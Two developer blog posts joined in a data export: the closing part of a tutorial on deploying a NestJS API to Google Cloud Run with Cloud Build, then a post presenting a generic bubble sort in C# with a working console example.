Alright, now we have all the requirements we need.
We've created our API and also containerized it with the help of Docker. Now, we're ready to deploy our API to Cloud Run.
Well, it's quite simple, I think, because we just have to do a few steps to complete it :D
Okay let's deploy.
In order to deploy our API to Cloud Run, we'll use a Google Cloud service called Cloud Build. This service will automate our deployment to Cloud Run.
First of all, create a new project in the GCP Console, then copy your project's ID.
Then to use Cloud Build, we have to create another file in our root project directory called `cloudbuild.yaml`. Then copy and paste following code to your `cloudbuild.yaml`.
```yaml
steps:
# Build the container image
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/PROJECT_ID/IMAGE', '.']
# Push the container image to Container Registry
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/PROJECT_ID/IMAGE']
# Deploy container image to Cloud Run
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args: ['run', 'deploy', 'SERVICE-NAME', '--image', 'gcr.io/PROJECT_ID/IMAGE', '--region', 'REGION', '--platform', 'managed', '--port', '3000']
images:
- gcr.io/PROJECT_ID/IMAGE
```
That's just a template; customize it to fit your case. Don't forget to add `--port 3000` after `--platform managed`, since our app listens on port 3000.
The template code is available in the Google Cloud Build documentation [here](https://cloud.google.com/build/docs/deploying-builds/deploy-cloud-run). Just head over there, scroll until you find the "Building and deploying a container" section, and read what the above code means.
Now push your `cloudbuild.yaml` to GitHub.
```bash
$ git add .
$ git commit -m "added cloudbuild.yaml file"
$ git push origin main
```
Back in your GCP Console, open Cloud Shell. Then make a directory called whatever you want. I'll name it "projects" for now.
```bash
$ mkdir projects
$ cd projects
```
Clone your code from GitHub that we just created earlier.
```bash
$ git clone <your-repository-url>
$ cd <your-project-name>
```
Then, finally, run the command below to deploy your API to Cloud Run.
```bash
$ gcloud builds submit
```
If you get a "run.service.get" permission error during `gcloud builds submit`, you can go [here](https://cloud.google.com/build/docs/deploying-builds/deploy-cloud-run#required_iam_permissions), enable the "Cloud Run Admin" role, and then run `gcloud builds submit` again.
After it finished, go to Cloud Run dashboard, and click on the service that you just created.
Click "Permissions" tab and then click "+ Add".
For "New members" field, type `allUsers` and for "Role" field, select **Cloud Run Invoker**.
Click **Save**, then **Allow Public Access** and re-run `gcloud builds submit`.
We're done.
---
Alright, I think that's all for Deploy NestJS API to Cloud Run episode.
Well, this is my first article of my life. I know it's not perfect yet, I feel that :D but don't worry, I'll keep improving my writing skill.
Hopefully, you can get something new from this tutorial. Thanks for reading.
See you on the next article :D | ajipandean |
778,864 | Generic bubble sort in C# .NET | Early this year, I decided to brush up on my algorithms and data structure knowledge. I took these... | 0 | 2021-08-02T15:51:24 | https://swimburger.net/blog/dotnet/generic-bubble-sort-in-csharp-dotnet | dotnet, csharp |
---
title: Generic bubble sort in C# .NET
published: true
date: 2021-08-01 00:00:00 UTC
tags: dotnet, csharp
canonical_url: https://swimburger.net/blog/dotnet/generic-bubble-sort-in-csharp-dotnet
---
Early this year, I decided to brush up on my algorithms and data structure knowledge. I took these great two courses ([1](https://www.pluralsight.com/courses/algorithms-data-structures-part-one), [2](https://www.pluralsight.com/courses/algorithms-data-structures-part-two)) on PluralSight by Robert Horvick.
To practice what I learned in this course, I decided to create generic versions of the different algorithms and data structures.
What do I mean by generic versions? These types of courses always use integers or strings to demonstrate the algorithms. Instead of using those primitive data types, I'm reimplementing the algorithms and data structures using C#'s [generic type parameters](https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/generics/generic-type-parameters).
Here's a console application with a generic method `BubbleSort` to perform a bubble sort on an enumerable:
```csharp
using System;
using System.Collections.Generic;
using System.Linq;
class Program
{
static void Main(string[] args)
{
var randomNumbers = new int[] { 5, 4, 5, 7, 6, 9, 4, 1, 1, 3, 4, 50, 56, 41 };
var sortedNumbers = BubbleSort(randomNumbers);
PrintList(sortedNumbers);
Console.ReadKey();
}
private static IEnumerable<T> BubbleSort<T>(IEnumerable<T> list) where T : IComparable
{
T[] sortedList = list.ToArray();
int listLength = sortedList.Length;
while (true)
{
bool performedSwap = false;
for (int currentItemIndex = 1; currentItemIndex < listLength; currentItemIndex++)
{
int previousItemIndex = currentItemIndex - 1;
T previousItem = sortedList[previousItemIndex];
T currentItem = sortedList[currentItemIndex];
var comparison = previousItem.CompareTo(currentItem);
if (comparison > 0)
{
sortedList[previousItemIndex] = currentItem;
sortedList[currentItemIndex] = previousItem;
performedSwap = true;
}
}
if (!performedSwap)
{
break;
}
}
return sortedList;
}
private static void PrintList<T>(IEnumerable<T> list)
{
foreach (var item in list)
{
Console.WriteLine(item);
}
}
}
```
By using a generic type parameter with the constraint that the type has to implement the `IComparable` interface, you can perform the bubble sort algorithm without knowing the exact type you are working with.
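For example, because `string` also implements `IComparable`, the same method sorts strings with no changes (a small sketch, not part of the original program, that would run inside `Main`):

```csharp
// string implements IComparable, so the generic constraint is satisfied
var words = new[] { "pear", "apple", "mango" };
var sortedWords = BubbleSort(words);
PrintList(sortedWords); // prints apple, mango, pear (one per line)
```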
If you want to understand the logic behind the bubble sort algorithm, I recommend checking out the courses mentioned earlier. There's also a lot of other great resources out there online!
Disclaimer: This code works, but is only developed for the sake of practice. Use at your own risk or just use a sorting library. If you see some room for improvement, there most likely is, I'm all ears~ | swimburger |